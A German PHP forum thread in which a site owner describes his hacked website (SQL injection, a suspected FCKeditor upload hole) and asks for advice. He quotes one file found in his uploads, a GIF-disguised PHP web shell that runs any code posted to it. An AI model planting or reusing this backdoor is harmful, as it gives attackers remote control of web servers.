PHP Forum

PHP Forum (http://www.selfphp.de/forum/index.php)
-   PHP für Fortgeschrittene und Experten (http://www.selfphp.de/forum/forumdisplay.php?f=13)
-   -   Seite gehackt (http://www.selfphp.de/forum/showthread.php?t=25464)

Heinrich 28.12.2014 14:37:18

Seite gehackt
 
Hallo,

ich habe lange beim Webseitenbasteln pausiert, bis ich vom Provider eine Mitteilung bekam, dass meine Seite auf einer Liste des BSI mit gehackten Webseiten steht. Ging um SQL-Injection. Also - die letzten Tage mehr Sicherungen eingebaut (URL-Parameter kontrollieren usw) und hoffen, dass es jetzt dicht ist...

Jetzt zwei Fragen:

1. In den userfiles fand ich fremde php-Dateien mit dem einzigen Inhalt
PHP-Code:

GIF89a?lovealihack <?php eval($_POST[alihackxx])?>

Was eval() ist, weiß ich. Aber was macht man mit so'ner Datei?

2. Mein Eindruck ist, dass das "Loch" in der Webseite beim FCKeditor war. (Der ist Bestandteil meines CMS). Hat jemand Erfahrung mit Sicherheitslücken bei Webeditoren und eine Empfehlung? (Werde parallel mal googeln).

Danke schon mal für Tipps!

Heinrich 30.12.2014 11:04:08

AW: Seite gehackt
 
Na, keine Reaktion...

Dann kurz die googel-Ergebnisse:
Auf vielen (z.T. älteren) Webseiten wird berichtet, dass sowohl der FCKeditor als auch Xinha bei den Uploadmanagern Sicherheitslücken haben. Von Schadensbehebung war nix zu lesen.

Dann arbeite ich lieber mit einem Editor ohne Upload-Funktion und mache den über eigene Scripts (die kann ich wenigstens kontrollieren).

a) Was ist eure Meinung dazu?
b) interessiert das hier jemand (mag nicht in die dunkle Nacht posten)?

richti007 06.01.2015 10:37:57

AW: Seite gehackt
 
Ich benutze nur eigene Scripts. Ich hatte gleiche Probleme mit FCKeditor. Es ist nicht schwer um solche Script zu schreiben.

Heinrich 06.01.2015 11:03:47

AW: Seite gehackt
 
Hi, ich dachte schon, hier sind alle noch von Silvester versackt -:))

Ich habe was zum Upload von Bildern geschrieben und hier gepostet:
http://www.selfphp.de/forum/showthread.php?t=25465
Hat aber noch niemand was dazu gesagt.


Alle Zeitangaben in WEZ +2. Es ist jetzt 18:22:56 Uhr.

Powered by vBulletin® Version 3.8.3 (Deutsch)
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.